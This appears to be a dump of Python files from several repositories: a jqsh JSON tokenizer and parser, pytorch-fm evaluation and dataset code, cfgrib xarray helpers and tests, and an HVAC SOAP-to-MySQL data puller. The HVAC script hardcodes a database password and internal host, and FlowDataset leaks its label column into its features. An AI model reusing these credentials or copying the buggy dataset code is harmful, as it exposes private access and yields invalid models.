for i, token in reversed(list(enumerate(tokens))):
if isinstance(token, jqsh.filter.Filter) and has_next_operand:
tokens[i:i + (3 if has_previous_operand else 2)] = [precedence_group[tokens[i + 1].type](left=left_operand, right=right_operand)]
has_next_operand = False
elif isinstance(token, Token) and token.type in precedence_group:
left_operand, has_left_operand = (tokens[i - 1], True) if i > 0 and isinstance(tokens[i - 1], jqsh.filter.Filter) else (raise_for_filter(jqsh.filter.Filter()), False)
right_operand, has_right_operand = (tokens[i + 1], True) if i + 1 < len(tokens) and isinstance(tokens[i + 1], jqsh.filter.Filter) else (raise_for_filter(jqsh.filter.Filter()), False)
has_previous_operand = has_right_operand
has_next_operand = has_left_operand
if ltr:
left_operand, right_operand = right_operand, left_operand
has_left_operand, has_right_operand = has_right_operand, has_left_operand
if not has_next_operand:
tokens[i:i + (2 if has_previous_operand else 1)] = [precedence_group[token.type](left=left_operand, right=right_operand)]
else:
has_next_operand = False
if ltr:
tokens.reverse()
if len(tokens) == 1 and isinstance(tokens[0], jqsh.filter.Filter):
return tokens[0] # finished parsing
else:
raise SyntaxError('Could not parse token list: ' + repr(tokens))
def parse_json(tokens, allow_extension_types=False):
if isinstance(tokens, str):
tokens = list(tokenize(tokens))
if len(tokens) == 0 or len(tokens) == 1 and isinstance(tokens[0], Token) and tokens[0].type is TokenType.trailing_whitespace:
raise Incomplete('JSON is empty')
if isinstance(tokens[-1], Token) and tokens[-1].type is TokenType.trailing_whitespace:
tokens.pop()
ret_path = []
key = None
token_index = 0
while token_index < len(tokens):
token = tokens[token_index]
if allow_extension_types and isinstance(token, jqsh.values.Value):
ret_path = set_value_at_ret_path(ret_path, key, token)
token_index += 1
elif token.type is TokenType.name:
if token.text == 'false':
ret_path = set_value_at_ret_path(ret_path, key, jqsh.values.Boolean(False))
token_index += 1
elif token.text == 'null':
ret_path = set_value_at_ret_path(ret_path, key, jqsh.values.Null())
token_index += 1
elif token.text == 'true':
ret_path = set_value_at_ret_path(ret_path, key, jqsh.values.Boolean(True))
token_index += 1
else:
raise SyntaxError('Illegal name token ' + repr(token.text) + ' at position ' + repr(token_index) + ' (expected false, null, or true)')
elif token.type is TokenType.number:
ret_path = set_value_at_ret_path(ret_path, key, jqsh.values.Number(token.text))
token_index += 1
elif token.type is TokenType.open_array:
array = jqsh.values.Array(terminated=False)
ret_path = set_value_at_ret_path(ret_path, key, array)
token_index += 1
if token_index >= len(tokens):
raise Incomplete('Unclosed JSON array at position ' + str(token_index))
if tokens[token_index].type is TokenType.close_array: # empty array parsed
array.terminate()
token_index += 1
else:
ret_path.append(array)
continue
elif token.type is TokenType.open_object:
obj = jqsh.values.Object(terminated=False)
ret_path = set_value_at_ret_path(ret_path, key, obj)
token_index += 1
if token_index >= len(tokens):
raise Incomplete('Unclosed JSON object at position ' + str(token_index))
token = tokens[token_index]
if token.type is TokenType.close_object: # empty object parsed
obj.terminate()
token_index += 1
elif token.type is TokenType.string:
ret_path.append(obj)
key = token.text
token_index += 1
if token_index >= len(tokens):
raise Incomplete('Unclosed JSON object at position ' + str(token_index))
elif tokens[token_index].type is not TokenType.colon:
raise illegal_token_exception(token, position=token_index, expected={TokenType.colon})
else:
token_index += 1
if token_index >= len(tokens):
raise Incomplete('Unclosed JSON object at position ' + str(token_index))
continue
else:
raise illegal_token_exception(token, position=token_index, expected={TokenType.close_object, TokenType.string})
elif token.type is TokenType.string:
ret_path = set_value_at_ret_path(ret_path, key, token.text)
token_index += 1
else:
raise illegal_token_exception(token, position=token_index, expected={TokenType.name, TokenType.number, TokenType.open_array, TokenType.open_object, TokenType.string, TokenType.trailing_whitespace})
keep_closing = True
while keep_closing and len(ret_path) > 1:
if isinstance(ret_path[-1], jqsh.values.Object): # we are in an object, get the next key or close it
if token_index >= len(tokens):
raise Incomplete('Unclosed JSON object at position ' + str(token_index))
token = tokens[token_index]
if token.type is TokenType.close_object:
ret_path[-1].terminate()
if len(ret_path) == 1:
keep_closing = False
else:
ret_path.pop()
token_index += 1
elif token.type is TokenType.comma:
token_index += 1
if token_index >= len(tokens):
raise Incomplete('Unclosed JSON object at position ' + str(token_index))
token = tokens[token_index]
if token.type is TokenType.string:
key = token.text
token_index += 1
if token_index >= len(tokens):
raise Incomplete('Unclosed JSON object at position ' + str(token_index))
elif tokens[token_index].type is not TokenType.colon:
raise illegal_token_exception(token, position=token_index, expected={TokenType.colon})
else:
token_index += 1
if token_index >= len(tokens):
raise Incomplete('Unclosed JSON object at position ' + str(token_index))
keep_closing = False
else:
raise illegal_token_exception(token, position=token_index, expected={TokenType.string})
else:
raise illegal_token_exception(token, position=token_index, expected={TokenType.close_object, TokenType.comma})
else: # we are in an array, check if it continues
if token_index >= len(tokens):
raise Incomplete('Unclosed JSON array at position ' + str(token_index))
token = tokens[token_index]
if token.type is TokenType.close_array:
ret_path[-1].terminate()
if len(ret_path) == 1:
keep_closing = False
else:
ret_path.pop()
token_index += 1
elif token.type is TokenType.comma:
token_index += 1
if token_index >= len(tokens):
raise Incomplete('Unclosed JSON array at position ' + str(token_index))
keep_closing = False
else:
raise illegal_token_exception(token, position=token_index, expected={TokenType.close_array, TokenType.comma})
if token_index < len(tokens):
raise SyntaxError('Multiple top-level JSON values found')
return ret_path[0]
def parse_json_values(tokens):
if isinstance(tokens, str):
tokens = list(tokenize(tokens))
if len(tokens) and tokens[-1].type is TokenType.trailing_whitespace:
tokens = tokens[:-1]
prefix_length = 1
last_exception = None
while len(tokens):
if prefix_length > len(tokens):
raise last_exception
try:
yield parse_json(tokens[:prefix_length])
tokens = tokens[prefix_length:]
prefix_length = 1
except Incomplete as e:
last_exception = e
prefix_length += 1
def set_value_at_ret_path(ret_path, key, value):
if len(ret_path):
if isinstance(ret_path[-1], jqsh.values.Object):
ret_path[-1].push((key, value))
else:
ret_path[-1].push(value)
return ret_path
else:
return [value]
def tokenize(jqsh_string):
def shift(rest_string, line, column, amount=1):
for _ in range(amount):
removed_character = rest_string[0]
rest_string = rest_string[1:]
if removed_character == '\n':
line += 1
column = 0
else:
column += 1
return rest_string, line, column
rest_string = jqsh_string
if not isinstance(rest_string, str):
rest_string = rest_string.decode('utf-8')
whitespace_prefix = ''
if rest_string.startswith('\ufeff'):
whitespace_prefix += rest_string[0]
rest_string = rest_string[1:]
line = 1
column = 0
parens_stack = []
while len(parens_stack) and parens_stack[-1] < 0 or len(rest_string):
if len(parens_stack) and parens_stack[-1] < 0 or rest_string[0] == '"':
if len(parens_stack) and parens_stack[-1] < 0:
token_type = TokenType.string_end_incomplete
string_literal = ')'
parens_stack.pop()
string_start_line = line
string_start_column = column - 1
else:
rest_string, line, column = shift(rest_string, line, column)
token_type = TokenType.string_incomplete
string_literal = '"'
string_start_line = line
string_start_column = column
string_content = ''
while len(rest_string):
if rest_string[0] == '"':
token_type = {
TokenType.string_end_incomplete: TokenType.string_end,
TokenType.string_incomplete: TokenType.string
}[token_type]
string_literal += '"'
rest_string, line, column = shift(rest_string, line, column)
break
elif rest_string[0] == '\\':
rest_string, line, column = shift(rest_string, line, column)
if rest_string[0] in escapes:
string_literal += '\\' + rest_string[0]
string_content += escapes[rest_string[0]]
rest_string, line, column = shift(rest_string, line, column)
elif rest_string[0] == 'u':
try:
escape_sequence = int(rest_string[1:5], 16)
except (IndexError, ValueError):
yield Token(token_type, token_string=whitespace_prefix + string_literal, text=string_content, line=string_start_line, column=string_start_column)
yield Token(TokenType.illegal, token_string=whitespace_prefix + rest_string, text=rest_string, line=line, column=column)
return
else:
string_literal += '\\' + rest_string[:5]
string_content += chr(escape_sequence) #TODO check for UTF-16 surrogate characters
rest_string, line, column = shift(rest_string, line, column, amount=5)
elif rest_string[0] == '(':
string_literal += '\\('
parens_stack.append(0)
token_type = {
TokenType.string_end_incomplete: TokenType.string_middle,
TokenType.string_incomplete: TokenType.string_start
}[token_type]
rest_string, line, column = shift(rest_string, line, column)
break
else:
yield Token(token_type, token_string=whitespace_prefix + string_literal, text=string_content, line=string_start_line, column=string_start_column)
yield Token(TokenType.illegal, token_string=whitespace_prefix + '\\' + rest_string, text='\\' + rest_string, line=line, column=column)
return
else:
string_literal += rest_string[0]
string_content += rest_string[0]
rest_string, line, column = shift(rest_string, line, column)
yield Token(token_type, token_string=whitespace_prefix + string_literal, text=string_content, line=string_start_line, column=string_start_column)
whitespace_prefix = ''
elif rest_string[0] in string.whitespace:
whitespace_prefix += rest_string[0]
rest_string, line, column = shift(rest_string, line, column)
elif rest_string[0] == '#':
comment_start_line = line
comment_start_column = column
rest_string, line, column = shift(rest_string, line, column)
comment = ''
while len(rest_string):
if rest_string[0] == '\n':
break
comment += rest_string[0]
rest_string, line, column = shift(rest_string, line, column)
yield Token(TokenType.comment, token_string=whitespace_prefix + '#' + comment, text=comment, line=comment_start_line, column=comment_start_column)
whitespace_prefix = ''
elif rest_string[0] in string.ascii_letters:
name_start_line = line
name_start_column = column
name = ''
while len(rest_string) and rest_string[0] in string.ascii_letters:
name += rest_string[0]
rest_string, line, column = shift(rest_string, line, column)
yield Token(TokenType.name, token_string=whitespace_prefix + name, text=name, line=name_start_line, column=name_start_column)
whitespace_prefix = ''
elif rest_string[0] in string.digits:
number_start_line = line
number_start_column = column
number = ''
while len(rest_string) and rest_string[0] in string.digits:
number += rest_string[0]
rest_string, line, column = shift(rest_string, line, column)
yield Token(TokenType.number, token_string=whitespace_prefix + number, text=number, line=number_start_line, column=number_start_column)
whitespace_prefix = ''
elif any(rest_string.startswith(symbol) for symbol in symbols):
for symbol, token_type in sorted(symbols.items(), key=lambda pair: -len(pair[0])): # look at longer symbols first, so that a += is not mistakenly tokenized as a +
if rest_string.startswith(symbol):
if len(parens_stack):
if token_type is TokenType.open_paren:
parens_stack[-1] += 1
elif token_type is TokenType.close_paren:
parens_stack[-1] -= 1
if len(parens_stack) == 0 or parens_stack[-1] >= 0:
yield Token(token_type, token_string=whitespace_prefix + rest_string[:len(symbol)], line=line, column=column)
whitespace_prefix = ''
rest_string, line, column = shift(rest_string, line, column, amount=len(symbol))
break
else:
yield Token(TokenType.illegal, token_string=whitespace_prefix + rest_string, text=rest_string, line=line, column=column)
return
if len(whitespace_prefix):
yield Token(TokenType.trailing_whitespace, token_string=whitespace_prefix)
``` |
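Together, `tokenize`, `parse_json` and `parse_json_values` form an incremental JSON reader over the jqsh token stream: `tokenize` yields typed tokens, `parse_json` raises `Incomplete` when a value is cut off, and `parse_json_values` keeps growing the token prefix until a complete top-level value parses. A small usage sketch, assuming the `jqsh` package is importable as written:
```python
# Usage sketch for the tokenizer / incremental JSON parser above.
import jqsh.parser

tokens = list(jqsh.parser.tokenize('{"a": [1, 2]}'))
print([t.type.name for t in tokens])    # open_object, string, colon, ...

value = jqsh.parser.parse_json('{"a": [1, 2]}')
print(value)                            # the parsed jqsh.values.Object

for v in jqsh.parser.parse_json_values('1 2 "three"'):
    print(v)                            # three successive top-level values
```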
{
"source": "jqsl2012/pytorch-fm",
"score": 2
} |
#### File: pytorch-fm/examples/torch_load.py
```python
import torch
from sklearn.metrics import roc_auc_score
import tqdm
from torch.utils.data import DataLoader
from torchfm.dataset.avazu import AvazuDataset
from torchfm.dataset.criteo import CriteoDataset
from torchfm.dataset.movielens import MovieLens1MDataset, MovieLens20MDataset
import time
def get_dataset(name, path):
if name == 'movielens1M':
return MovieLens1MDataset(path)
elif name == 'movielens20M':
return MovieLens20MDataset(path)
elif name == 'criteo':
# return CriteoDataset(path, cache_path='.criteo_test')
return CriteoDataset(path)
elif name == 'avazu':
return AvazuDataset(path)
else:
raise ValueError('unknown dataset name: ' + name)
def load_model():
save_path = '/home/eduapp/pytorch-fm/data/criteo/save_dir/ipnn.pt'
# save_path = '/home/eduapp/pytorch-fm/data/criteo/save_dir/lr.pt'
save_path = '/home/eduapp/pytorch-fm/examples_prod/ipnn.pt'
model = torch.load(save_path)
print(model.eval())
return model
def test(model, data_loader, device):
model.eval()
targets, predicts = list(), list()
result_list = []
with torch.no_grad():
for fields, target in tqdm.tqdm(data_loader, smoothing=0, mininterval=1.0):
fields, target = fields.to(device).long(), target.to(device).long()
y = model(fields)
targets.extend(target.tolist())
predicts.extend(y.tolist())
print('========pred result list save to file================')
for i in range(len(targets)):
result_list.append(str(targets[i]) + ',' + str(predicts[i]) + '\n')
file = open('result_list.txt', "w")
file.writelines(result_list)
file.close()
from sklearn.metrics import classification_report
arr = []
for x in predicts:
# print(x)
arr.append(1) if x >= 0.5 else arr.append(0)
print(classification_report(targets, arr))
auc = roc_auc_score(targets, arr)
print('auc={}'.format(auc))
if __name__ == '__main__':
model = load_model()
device = torch.device('cpu')
dataset_path = '/home/eduapp/best_flow/20200907_more2more/all_features.train.1000.fe_output.csv'
# dataset_path = '/home/eduapp/pytorch-fm/examples/all_features.train.1000.fe_output.csv'
dataset_path = '/home/eduapp/best_flow/20200907_more2more/all_features_use_model_estimate_path.fe_output.csv'
dataset_path = '/home/eduapp/best_flow/20200907_more2more/all_features.train.fe_output.csv'
t1 = time.time()
dataset = get_dataset('criteo', dataset_path)
train_length = int(len(dataset) * 0.1)
valid_length = int(len(dataset) * 0.1)
test_length = len(dataset) - train_length - valid_length
train_dataset, valid_dataset, test_dataset = torch.utils.data.random_split(
dataset, (train_length, valid_length, test_length))
test_data_loader = DataLoader(test_dataset, batch_size=2048, num_workers=0)
print('dataset time={}'.format(time.time() - t1))
test(model, test_data_loader, device)
```
#### File: torchfm/dataset/flow.py
```python
import numpy as np
import pandas as pd
import torch.utils.data
class FlowDataset(torch.utils.data.Dataset):
"""
MovieLens 20M Dataset
Data preparation
treat samples with a rating less than 3 as negative samples
:param dataset_path: MovieLens dataset path
Reference:
https://grouplens.org/datasets/movielens
"""
def __init__(self, dataset_path, sep=',', engine='c', header='infer'):
print('__init___')
data = pd.read_csv(dataset_path, sep=sep, engine=engine, header=header).to_numpy()[:, :]
        self.items = data[:, 1:].astype(np.float64)  # feature columns: everything from column 1 onward
        self.targets = data[:, 1].astype(np.int64)
#print(self.targets)
#self.field_dims = np.max(self.items, axis=0) + 1
self.field_dims = np.array([2, 4, 2, 34, 18, 7, 998, 208, 47, 3, 2, 5, 3, 3, 982, 972, 375, 982, 951, 443, 979, 951, 455, 606, 850, 808, 1012, 573, 573, 87, 670, 588, 664, 663, 670, 99, 98, 52, 1072, 1057, 1059, 390, 1060, 479, 429, 175, 860, 860, 860, 860, 196, 893, 216, 903, 178, 665, 910, 570, 407, 4, 22, 139])
print(type(self.field_dims), self.field_dims)
def __len__(self):
print('.....__len__...', self.targets.shape[0])
return self.targets.shape[0]
def __getitem__(self, index):
#print('.....__getitem__...', index)
#print(index, self.targets[index], self.items[index])
return self.items[index], self.targets[index]
``` |
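`FlowDataset` loads the whole CSV into memory and serves `(features, target)` rows, with `field_dims` hard-coded to the cardinalities the torchfm models expect. A hypothetical loading sketch (the CSV path is a placeholder and must match that layout):
```python
# Hypothetical usage of FlowDataset with a torch DataLoader.
from torch.utils.data import DataLoader
from torchfm.dataset.flow import FlowDataset

dataset = FlowDataset("all_features.fe_output.csv")    # placeholder path
loader = DataLoader(dataset, batch_size=256, shuffle=True)
for fields, target in loader:
    fields, target = fields.long(), target.float()     # models take integer field indices
    break
```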
{
"source": "jqs-noaa/cfgrib",
"score": 2
} |
#### File: cfgrib/cfgrib/xarray_store.py
```python
import logging
import typing as T # noqa
import warnings
import xarray as xr
from . import DatasetBuildError, open_fileindex
LOGGER = logging.getLogger(__name__)
def open_dataset(path, **kwargs):
# type: (str, T.Any) -> xr.Dataset
"""
Return a ``xr.Dataset`` with the requested ``backend_kwargs`` from a GRIB file.
"""
if "engine" in kwargs and kwargs["engine"] != "cfgrib":
raise ValueError("only engine=='cfgrib' is supported")
kwargs["engine"] = "cfgrib"
return xr.backends.api.open_dataset(path, **kwargs)
def merge_datasets(datasets, **kwargs):
merged = []
for ds in datasets:
ds.attrs.pop("history", None)
for i, o in enumerate(merged):
if all(o.attrs[k] == ds.attrs[k] for k in o.attrs):
try:
o = xr.merge([o, ds], **kwargs)
o.attrs.update(ds.attrs)
merged[i] = o
break
except Exception:
pass
else:
merged.append(ds)
return merged
def raw_open_datasets(path, backend_kwargs={}, **kwargs):
# type: (str, T.Dict[str, T.Any], T.Any) -> T.List[xr.Dataset]
fbks = []
datasets = []
try:
datasets.append(open_dataset(path, backend_kwargs=backend_kwargs, **kwargs))
except DatasetBuildError as ex:
fbks.extend(ex.args[2])
# NOTE: the recursive call needs to stay out of the exception handler to avoid showing
# to the user a confusing error message due to exception chaining
for fbk in fbks:
bks = backend_kwargs.copy()
bks["filter_by_keys"] = fbk
datasets.extend(raw_open_datasets(path, backend_kwargs=bks, **kwargs))
return datasets
def open_variable_datasets(path, backend_kwargs={}, **kwargs):
fileindex_kwargs = {
key: backend_kwargs[key]
for key in ["filter_by_keys", "indexpath", "grib_errors"]
if key in backend_kwargs
}
index = open_fileindex(path, **fileindex_kwargs)
datasets = []
for param_id in sorted(index["paramId"]):
bk = backend_kwargs.copy()
bk["filter_by_keys"] = backend_kwargs.get("filter_by_keys", {}).copy()
bk["filter_by_keys"]["paramId"] = param_id
datasets.extend(raw_open_datasets(path, bk, **kwargs))
return datasets
def open_datasets(path, no_warn=False, backend_kwargs={}, **kwargs):
"""
Open a GRIB file groupping incompatible hypercubes to different datasets via simple heuristics.
"""
if no_warn:
warnings.warn("open_datasets is now public, no_warn will be removed", FutureWarning)
squeeze = backend_kwargs.get("squeeze", True)
backend_kwargs = backend_kwargs.copy()
backend_kwargs["squeeze"] = False
datasets = open_variable_datasets(path, backend_kwargs=backend_kwargs, **kwargs)
type_of_level_datasets = {}
for ds in datasets:
for _, da in ds.data_vars.items():
type_of_level = da.attrs.get("GRIB_typeOfLevel", "undef")
type_of_level_datasets.setdefault(type_of_level, []).append(ds)
merged = []
for type_of_level in sorted(type_of_level_datasets):
for ds in merge_datasets(type_of_level_datasets[type_of_level], join="exact"):
merged.append(ds.squeeze() if squeeze else ds)
return merged
```
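`open_datasets` exists because one GRIB file can hold hypercubes that cannot share a single `xr.Dataset` (for example different `typeOfLevel` values): it opens one dataset per `paramId`, then merges the compatible ones back together grouped by level type. A short usage sketch with placeholder file names:
```python
# Usage sketch: one xr.Dataset per group of compatible GRIB hypercubes.
from cfgrib.xarray_store import open_dataset, open_datasets

ds = open_dataset("era5-levels-members.grib")    # homogeneous file: single dataset
parts = open_datasets("mixed-levels.grib")       # placeholder heterogeneous file
for part in parts:
    print(list(part.data_vars))
```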
#### File: cfgrib/tests/test_10_bindings.py
```python
import os.path
import pytest
from cfgrib import bindings
SAMPLE_DATA_FOLDER = os.path.join(os.path.dirname(__file__), "sample-data")
TEST_DATA = os.path.join(SAMPLE_DATA_FOLDER, "era5-levels-members.grib")
TEST_DATA_B = TEST_DATA.encode("ASCII")
@pytest.mark.parametrize(
"code, message", [(0, "No error"), (-43, "End of index reached"),],
)
def test_grib_get_error_message(code, message):
res = bindings.grib_get_error_message(code)
assert res == message
def test_check_last():
codes_handle_new_from_file = bindings.check_last(bindings.lib.codes_handle_new_from_file)
with open(TEST_DATA) as file:
codes_handle_new_from_file(bindings.ffi.NULL, file, bindings.CODES_PRODUCT_GRIB)
with pytest.raises(bindings.GribInternalError):
with open(__file__) as file:
codes_handle_new_from_file(bindings.ffi.NULL, file, bindings.CODES_PRODUCT_GRIB)
def test_check_return():
def identity(code):
return code
bindings.check_return(identity)(0)
with pytest.raises(bindings.GribInternalError):
bindings.check_return(identity)(-1)
def test_codes_grib_new_from_file():
res = bindings.codes_grib_new_from_file(open(TEST_DATA))
assert isinstance(res, bindings.ffi.CData)
assert "'grib_handle *'" in repr(res)
def test_codes_clone():
handle = bindings.codes_grib_new_from_file(open(TEST_DATA))
res = bindings.codes_clone(handle)
assert isinstance(res, bindings.ffi.CData)
assert "'grib_handle *'" in repr(res)
def test_codes_grib_new_from_file_errors(tmpdir):
empty_grib = tmpdir.join("empty.grib")
empty_grib.ensure()
with pytest.raises(EOFError):
bindings.codes_grib_new_from_file(open(str(empty_grib)))
garbage_grib = tmpdir.join("garbage.grib")
garbage_grib.write("gargage")
with pytest.raises(EOFError):
bindings.codes_grib_new_from_file(open(str(garbage_grib)))
bad_grib = tmpdir.join("bad.grib")
bad_grib.write("GRIB")
with pytest.raises(bindings.GribInternalError):
bindings.codes_grib_new_from_file(open(str(bad_grib)))
@pytest.mark.parametrize(
"key, expected_type, expected_value",
[
("numberOfDataPoints", int, 7320),
("latitudeOfFirstGridPointInDegrees", float, 90.0),
("gridType", str, "regular_ll"),
],
)
def test_codes_get(key, expected_type, expected_value):
grib = bindings.codes_grib_new_from_file(open(TEST_DATA))
result = bindings.codes_get(grib, key)
assert isinstance(result, expected_type)
assert result == expected_value
def test_codes_get_errors():
grib = bindings.codes_grib_new_from_file(open(TEST_DATA))
with pytest.raises(bindings.GribInternalError) as err:
bindings.codes_get(grib, "gridType", length=1) # too short
assert err.value.code == bindings.lib.GRIB_BUFFER_TOO_SMALL
@pytest.mark.parametrize(
"key, expected_value",
[
("numberOfDataPoints", [7320]),
("latitudeOfFirstGridPointInDegrees", [90.0]),
("gridType", ["regular_ll"]),
],
)
def test_codes_get_array(key, expected_value):
grib = bindings.codes_grib_new_from_file(open(TEST_DATA))
result = bindings.codes_get_array(grib, key)
assert result == expected_value
def test_codes_get_array_errors():
grib = bindings.codes_grib_new_from_file(open(TEST_DATA))
with pytest.raises(bindings.GribInternalError) as err:
bindings.codes_get_array(grib, "values", size=1) # too short
assert err.value.code == bindings.lib.GRIB_ARRAY_TOO_SMALL
with pytest.raises(bindings.GribInternalError) as err:
bindings.codes_get_array(grib, "values", key_type=int) # wrong type
assert err.value.code == bindings.lib.GRIB_NOT_IMPLEMENTED
def test_codes_get_length():
grib = bindings.codes_grib_new_from_file(open(TEST_DATA))
res = bindings.codes_get_string_length(grib, "numberOfForecastsInEnsemble")
assert res == 1025
res = bindings.codes_get_string_length(grib, "marsParam")
assert res == 8
def test_codes_keys_iterator():
grib = bindings.codes_grib_new_from_file(open(TEST_DATA))
iterator = bindings.codes_keys_iterator_new(grib)
assert bindings.codes_keys_iterator_next(iterator) == 1
assert bindings.codes_keys_iterator_get_name(iterator) == "globalDomain"
assert bindings.codes_keys_iterator_next(iterator) == 1
assert bindings.codes_keys_iterator_get_name(iterator) == "GRIBEditionNumber"
bindings.codes_keys_iterator_delete(iterator)
iterator = bindings.codes_keys_iterator_new(grib, namespace="time")
assert bindings.codes_keys_iterator_next(iterator) == 1
assert bindings.codes_keys_iterator_get_name(iterator) == "dataDate"
assert bindings.codes_keys_iterator_next(iterator) == 1
assert bindings.codes_keys_iterator_get_name(iterator) == "dataTime"
bindings.codes_keys_iterator_delete(iterator)
def test_codes_get_api_version():
res = bindings.codes_get_api_version()
assert isinstance(res, str)
assert res.count(".") == 2
def test_codes_new_from_samples():
res = bindings.codes_new_from_samples("regular_ll_sfc_grib2")
assert isinstance(res, bindings.ffi.CData)
assert "grib_handle *'" in repr(res)
def test_codes_new_from_samples_errors():
with pytest.raises(ValueError):
bindings.codes_new_from_samples("non-existent")
def test_codes_set():
message_id = bindings.codes_new_from_samples("regular_ll_sfc_grib2")
bindings.codes_set(message_id, "endStep", 2)
bindings.codes_set(message_id, "longitudeOfFirstGridPointInDegrees", 1.0)
bindings.codes_set(message_id, "gridType", "regular_ll")
with pytest.raises(TypeError):
bindings.codes_set(message_id, "endStep", [])
def test_codes_set_array():
message_id = bindings.codes_new_from_samples("regular_ll_sfc_grib2")
bindings.codes_set_array(message_id, "values", [0.0])
bindings.codes_set_array(message_id, "values", [0])
with pytest.raises(ValueError):
bindings.codes_set_array(message_id, "values", [])
with pytest.raises(TypeError):
bindings.codes_set_array(message_id, "values", ["a"])
def test_codes_write(tmpdir):
message_id = bindings.codes_new_from_samples("regular_ll_sfc_grib2")
grib_file = tmpdir.join("test.grib")
with open(str(grib_file), "wb") as file:
bindings.codes_write(message_id, file)
assert grib_file.read_binary()[:4] == b"GRIB"
with open(str(grib_file)) as file:
bindings.codes_grib_new_from_file(file)
``` |
{
"source": "jqsun1/intelligent_hvac_backend",
"score": 2
} |
#### File: code/DataRetrieval/dataPull.py
```python
import zeep
import traceback
import sqlalchemy
import math
import time
from zeep.transports import Transport
from requests.auth import HTTPBasicAuth
from requests import Session as WebSession
from datetime import datetime, timezone, timedelta
from hvacDBMapping import *
from sqlalchemy.orm import sessionmaker
global componentsList, componentsClasses
componentsList = ["AHU", "VFD", "Filter", "Damper", "Fan", "HEC", "SAV", "VAV", "Thermafuser"]
componentsClasses = {"ahu":AHU, "vfd":VFD, "filter":Filter, "damper":Damper, "fan":Fan, "hec":HEC, "sav":SAV, "vav":VAV, "thermafuser":Thermafuser}
readingClasses = {"ahu":AHUReading, "vfd":VFDReading, "filter":FilterReading, "damper":DamperReading, "fan":FanReading, "hec":HECReading, "sav":SAVReading, "vav":VAVReading, "thermafuser":ThermafuserReading}
def getClient(servicewsdl):
"""Attempt to stablish a connection to the webservice and return a client object connected to servicewsdl webservice"""
client = None
try:
webSession = WebSession()
webSession.auth = HTTPBasicAuth('soap', "")
transport = Transport(timeout=10, session = webSession)
client = zeep.Client(wsdl=servicewsdl, transport=transport)
print('Client successfully created')
except Exception as e:
print(traceback.format_exc())
print("error in getting a client to the webservice")
return client
def getDatabaseConnection(databaseString):
"""Attempt connection to the database"""
sqlsession = None
try:
sqlengine = sqlalchemy.create_engine(databaseString)
SQLSession = sessionmaker(bind=sqlengine)
sqlsession = SQLSession()
print("Connection to " + databaseString + " successfull")
except Exception as e:
print(traceback.format_exc())
print("Error in connection to the database")
return sqlsession
def pullData(trendServiceClient, startDateTime, databaseSession):
"""Retrieve the data stored in the trend points of the WebCtrl program from the indicated startDateTime onwards and store them in the database.
This function will pull data from the database every 5 minutes starting from startDateTime and will keep doing it indefinetly."""
#get the datapoints and separate them by component type (this should be relaunched everytime the database is modified)
dataPoints = {key.lower():databaseSession.query(DataPoint._path, DataPoint._componentId, PathMapping._databaseMapping).
join(PathMapping).filter(PathMapping._componentType == key).all() for key in componentsList}
PDT = timezone(-timedelta(hours=7), 'PDT')
timeDelta = timedelta(minutes = 5)
    #Repeat indefinitely
while True:
#Define the endTime
endDateTime = startDateTime + timeDelta
currentTime = datetime.now(tz=PDT)
currentTime = currentTime.replace(second=0, microsecond=0)
        #If the desired time hasn't been reached yet, wait for a couple of minutes
if currentTime < endDateTime:
waitingMinutes = (endDateTime - currentTime) + timedelta(minutes=1)
print(str(currentTime) + " Desired time " + str(endDateTime) + " not reached yet, halting for " + str(waitingMinutes) + " minutes")
time.sleep(waitingMinutes.seconds)
print("Desired time reached, continuing job")
#For each type of components get its readings from the web service
for key in dataPoints:
print("\nPulling points of " + key + "\n")
components = dict()
for dataPoint in dataPoints[key]:
path, componentId, databaseMapping = dataPoint
if componentId in components:
component = components[componentId]
else:
component = readingClasses[key](endDateTime, componentId)
components[componentId] = component
try:
data = trendServiceClient.service.getTrendData('soap',"", path, startDateTime.strftime("%m/%d/20%y %I:%M:%S %p"), endDateTime.strftime("%m/%d/20%y %I:%M:%S %p"), False, 0)
#Check if the current point already has a component
readingValue = data[-1]
print(path, readingValue)
setattr(component, databaseMapping, readingValue)
except Exception as e:
print(traceback.format_exc())
print("Error in retrieving value for " + path)
databaseSession.add_all(components.values())
databaseSession.commit()
#Define the new start time
startDateTime = endDateTime
break
def main():
Evalwsdl = 'http://10.20.0.47/_common/webservices/Eval?wsdl'
Trendwsdl = 'http://10.20.0.47/_common/webservices/TrendService?wsdl'
databaseString = "mysql+mysqldb://dlaredorazo:@Dexsys13@localhost:3306/HVAC2"
    #Make sure the starting time is a multiple of 5 minutes and that it's a past time.
#To ensure that we will be able to get the readings we try to get the readings from 5+ minutes before the current time.
PDT = timezone(-timedelta(hours=7), 'PDT')
startTime = datetime.now(tz=PDT)
minute = math.floor(startTime.minute/5)*5 - 5
if minute < 0:
minute = 55
        startTime = startTime - timedelta(hours=1)
        startTime = startTime.replace(second=0, microsecond=0, minute=minute)
else:
startTime = startTime.replace(second=0, microsecond=0, minute=minute)
print("Start time " + str(startTime))
#get a connection to the webservice
trendServiceClient = getClient(Trendwsdl)
sqlsession = getDatabaseConnection(databaseString)
if trendServiceClient != None and sqlsession != None:
pullData(trendServiceClient, startTime, sqlsession)
main()
```
#### File: webServiceTest/iHvac/hvacIssueDBMapping.py
```python
from sqlalchemy import Column, Integer, String, Table, DateTime, Float, Boolean, ForeignKey, ForeignKeyConstraint
from sqlalchemy.ext.declarative import declarative_base
from sqlalchemy.orm import relationship, backref, class_mapper
Base = declarative_base()
class HVACIssue(Base):
"""Class to map to the HVACIssue table in the HVAC DB"""
__tablename__ = 'HVACIssue'
_id = Column('IssueId', Integer, primary_key = True, autoincrement = True)
_buildingLocation = Column('BuildingLocation', String(255))
_floorLocation = Column('FloorLocation', Integer)
_roomLocation = Column('RoomLocation', String(255))
_description = Column('Description', String(255))
#Constructor
def __init__(self, buildingLocation, floorLocation, roomLocation, description):
#self._id = identifier
self._buildingLocation = buildingLocation
self._floorLocation = floorLocation
self._roomLocation = roomLocation
self._description = description
#Properties
@property
def id(self):
return self._id
@id.setter
def id(self, value):
self._id = value
@property
def buildingLocation(self):
return self._buildingLocation
@buildingLocation.setter
def buildingLocation(self, value):
self._buildingLocation = value
@property
def floorLocation(self):
return self._floorLocation
@floorLocation.setter
def floorLocation(self, value):
self._floorLocation = value
@property
def roomLocation(self):
return self._roomLocation
@roomLocation.setter
def roomLocation(self, value):
self._roomLocation = value
@property
def description(self):
return self._description
@description.setter
def description(self, value):
self._description = value
def __str__(self):
return "<HvacIssue(id = '%s', buildingLocation = '%s', floorLocation = '%s', roomLocation = '%s', description = '%s')>" \
